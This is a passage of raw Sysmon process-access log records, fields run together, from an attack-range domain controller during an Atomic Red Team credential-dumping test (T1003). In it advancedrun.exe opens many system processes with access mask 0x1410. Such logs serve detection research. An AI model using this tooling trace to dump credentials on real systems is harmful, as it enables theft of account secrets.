17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003953014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953013Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\Advanced